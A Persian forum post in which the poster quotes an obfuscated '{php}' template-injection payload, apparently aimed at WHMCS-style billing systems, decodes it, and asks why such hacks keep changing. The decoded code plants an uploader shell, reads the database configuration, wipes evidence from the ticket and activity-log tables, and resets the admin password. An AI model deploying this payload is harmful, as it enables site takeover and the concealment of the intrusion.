نقل قول:
{php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb 2RlDQooIlBEOXdhSEFOQ21WamFHOGdKenhtYjNKdElHRmpkR2x 2 YmowaUlpQnRaWFJvYjJROUluQnZjM1FpSUdWdVkzUjVjR1U5SW 0xMWJIUnBjR0Z5ZEM5bWIzSnRM V1JoZEdFaUlHNWhiV1U5SW5Wd2JHOWhaR1Z5SWlCcFpEMGlkWE JzYjJGa1pYSWlQaWM3RFFwbFky aHZJQ2M4YVc1d2RYUWdkSGx3Wg0KDQpUMGlabWxzWlNJZ2JtRn RaVDBpWm1sc1pTSWdjMmw2WlQw aU5UQWlQanhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbF BTSnpkV0p0YVhRaUlHbGtQU0pm ZFhCc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSn pzTkNtbG1LQ0FrWDFCUFUxUmJK MTkxY0d3blhTQTlQU0FpVlhCcw0KDQpiMkZrSWlBcElIc05DZ2 xwWmloQVkyOXdlU2drWDBaSlRF VlRXeWRtYVd4bEoxMWJKM1J0Y0Y5dVlXMWxKMTBzSUNSZlJrbE 1SVk5iSjJacGJHVW5YVnNuYm1G dFpTZGRLU2tnZXlCbFkyaHZJQ2M4WWo1VmNHeHZZV1FnVTFWTF UwVlRJQ0VoSVR3dllqNDhZbkkN Cg0KK1BHSnlQaWM3SUgwTkNnbGxiSE5sSUhzZ1pXTm9ieUFuUE dJK1ZYQnNiMkZrSUVkQlIwRk1J Q0VoSVR3dllqNDhZbkkrUEdKeVBpYzdJSDBOQ24wTkNqOCsiKT sNCiRta2RpciA9IEBta2RpciAo ImtpbmciLDc1NSk7DQokZm8gPSBmb3Blbigia2luZy9raW5nLn BocCIsInciKTsNCmZ3cml0ZSgk Zm8sJGNvZGUpOw0KJHRleHQ9ZmlsZV9nZXRfY29udGVudHMoIm NvbmZpZ3VyYXRpb24ucGhwIik7 DQokdGV4dD0gc3RyX3JlcGxhY2UoIjw/cGhwIiwgIiIsICR0ZXh0KTsNCiR0ZXh0PSBzdHJfcmVw bGFjZSgiPD8iLCAiIiwgJHRleHQpOw0KJHRleHQ9IHN0cl9yZX BsYWNlKCI/PiIsICIiLCAkdGV4 dCk7DQpldmFsKCR0ZXh0KTsNCiRkYj1teXNxbF9jb25uZWN0KC RkYl9ob3N0LCRkYl91c2VybmFt ZSwkZGJfcGFzc3dvcmQpb3IgZGllKCJDYW4ndCBvcGVuIGNvbm 5lY3Rpb24gdG8gTXlTUUwiKTsN Cm15c3FsX3NlbGVjdF9kYigkZGJfbmFtZSkgb3IgZGllKCJDYW 4ndCBzZWxlY3QgZGF0YWJhc2Ui KTsNCiRkZWxldGUgPSJERUxFVEUgZnJvbSB0Ymx0aWNrZXRzIF dIRVJFIHRpdGxlIGxpa2UgMHgy NTdCNzA2ODcwN0QyNTsiOw0KbXlzcWxfcXVlcnkoJGRlbGV0ZS k7DQokZGVsZXRlMiA9IkRFTEVU RSBmcm9tIHRibGFjdGl2aXR5bG9nICBXSEVSRSBpcGFkZHI9Jy IuJF9TRVJWRVJbJ1JFTU9URV9B RERSJ10uIic7IjsNCm15c3FsX3F1ZXJ5KCRkZWxldGUyKTsNCi RzYSA9IG15c3FsX3F1ZXJ5KCJV UERBVEUgYHRibGFkbWluc2AgU0VUIGBwYXNzd29yZGAgPSAnND I5N2Y0NGIxMzk1NTIzNTI0NWIy NDk3Mzk5ZDdhOTMnIFdIRVJFIGB0YmxhZG1pbnNgLmBpZGAgPT EgTElNSVQgMSA7Iik7DQokc2Ex ID0gbXlzcWxfcXVlcnkoIlVQREFURSBgdGJsYWRtaW5zYCBTRV QgYGFkbWluYCA9ICdhZG1pbicg V0hFUkUgYHRibGFkbWluc2AuYGlkYCA9MSBMSU1JVCAxIDsiKT s='));{/php}
معنیشم میشه
نقل قول:
$mkdir = @mkdir ("king",755);
$fo = fopen("king/king.php","w");
fwrite($fo,$code);
$text=file_get_contents("configuration.php");
$text= str_replace("<?php", "", $text);
$text= str_replace("<?", "", $text);
$text= str_replace("?>", "", $text);
eval($text);
$db=mysql_connect($db_host,$db_username,$db_passwo rd)or die("Can't open connection to MySQL");
mysql_select_db($db_name) or die("Can't select database");
$delete ="DELETE from tbltickets WHERE title like 0x257B7068707D25;";
mysql_query($delete);
$delete2 ="DELETE from tblactivitylog WHERE ipaddr='".$_SERVER['REMOTE_ADDR']."';";
mysql_query($delete2);
$sa = mysql_query("UPDATE `tbladmins` SET `password` = '4297f44b13955235245b2497399d7a93' WHERE `tbladmins`.`id` =1 LIMIT 1 ;");
$sa1 = mysql_query("UPDATE `tbladmins` SET `admin` = 'admin' WHERE `tbladmins`.`id` =1 LIMIT 1 ;");
الان سوال من اینه روز به روز داره این نوع هک تغییر میکنه